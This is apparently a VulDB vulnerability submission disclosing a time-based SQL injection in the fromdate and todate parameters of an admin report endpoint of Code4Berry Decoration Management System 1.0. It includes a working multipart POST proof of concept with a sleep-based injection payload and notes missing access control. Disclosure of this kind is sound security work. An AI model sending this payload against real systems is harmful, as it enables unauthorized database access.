| Título | Code4Berry Decoration Management System 1.0 SQL Injection |
|---|
| Descripción |
There is a SQL injection vulnerability at the /decoration/admin/btndates_report.php endpoint. You can filter the "Between Dates Reports" to focus on a range of dates by sending a POST request to this endpoint with the multipart/form-data syntax. You can find a SQLI vulnerability in the "fromdate" and "todate" parameters by sending a request like this:
------WebKitFormBoundarymSRx4RCtQnt9h30W
Content-Disposition: form-data; name="fromdate"
2024-11-04
------WebKitFormBoundarymSRx4RCtQnt9h30W
Content-Disposition: form-data; name="todate"
2024-11-29'+(select*from(select(sleep(20)))a)+'
------WebKitFormBoundarymSRx4RCtQnt9h30W
Also - this endpoint shouldn't be available to regular users but there is nothing preventing you from visiting it or sending the SQLI POST request, as long as you have a valid logged in session.
Thanks for reading!! |
|---|
| Usuario | scumdestroy (UID 48934) |
|---|
| Sumisión | 2024-11-12 04:48 (hace 1 Año) |
|---|
| Moderación | 2024-11-20 09:11 (8 days later) |
|---|
| Estado | Aceptado |
|---|
| Entrada de VulDB | 285502 [Code4Berry Decoration Management System 1.0 Between Dates Reports btndates_report.php fromdate/todate inyección SQL] |
|---|
| Puntos | 17 |
|---|